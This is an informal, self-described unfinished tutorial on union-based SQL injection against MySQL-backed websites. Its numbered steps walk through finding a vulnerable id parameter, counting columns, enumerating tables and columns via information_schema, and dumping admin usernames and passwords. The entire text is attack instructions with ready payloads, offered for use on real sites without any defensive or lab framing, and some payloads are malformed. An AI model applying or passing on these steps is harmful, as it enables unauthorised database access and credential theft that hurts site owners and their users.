How to do a SQL Injection for MYSQL Server 5.0+

1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error

2. order by #–

Keep upping the # until you get an error.

3. union all select 1,#,#,#,#,#–

Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them

4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2

5. concat_ws(0×3A,version(),@@version) in vulnerable column

add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version

Will show the version of the SQL Server recommended that it be 5.0

6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–

This selects all the the tables from the database.

7. Find a table your after like admin or like users or user whatever table you wanna see

8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–

Replace x with the ASCII of table name You will need to convert Text to ASCII.

9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–

Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after

so for example say you found a table named admin and you wanna see the username and password columns you’d do

union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–

Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them down in displaying, be sure to change the table_name to the name of the table so say your going for admin change the table_name– to admin–

after that you will either get the username and password in plain text or it will be hashed.

just so you know change the # signs to the ammount of rows you get in Step 3 if you have 2 rows it should be 1,2 or you have 5 rows it should be 1,2,3,4,5 and so on.

Side note may need to add a – between like the thefilename.php?id=-#

So if a website has 5 rows you’d add all 5 rows the last number don’t add a “,”

Unfinished Tutorial Wrote by ZaraByte